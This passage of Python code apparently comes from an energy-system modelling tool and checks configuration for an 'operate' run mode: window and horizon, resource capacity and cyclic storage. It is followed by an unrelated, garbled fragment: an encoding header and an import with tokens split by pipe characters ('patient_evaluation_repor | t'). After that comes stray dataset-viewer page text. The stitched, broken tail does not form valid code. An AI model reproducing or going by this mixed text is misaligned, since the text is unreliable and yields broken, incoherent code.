        model_data['resource_cap'].attrs['operate_param'] = 1
        warnings.append(
            'Resource capacity constraint defined and set to infinity '
            'for all supply_plus techs'
        )
    # Operational mode iterates over a rolling window/horizon.
    window = model_data.attrs.get('run.operation.window', None)
    horizon = model_data.attrs.get('run.operation.horizon', None)
    if not window or not horizon:
        errors.append(
            'Operational mode requires a timestep window and horizon to be '
            'defined under run.operation'
        )
    elif horizon < window:
        errors.append(
            'Iteration horizon must be larger than iteration window, '
            'for operational mode'
        )
    # Cyclic storage isn't really valid in operate mode, so we ignore it, using
    # initial_storage instead (allowing us to pass storage between operation windows)
    if model_data.attrs.get('run.cyclic_storage', True):
        warnings.append(
            'Storage cannot be cyclic in operate run mode, setting '
            '`run.cyclic_storage` to False for this run'
        )
        model_data.attrs['run.cyclic_storage'] = False
    return comments, warnings, errors
|
# -*- | coding: utf-8 -*-
from patient_evaluation_repor | t import *
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.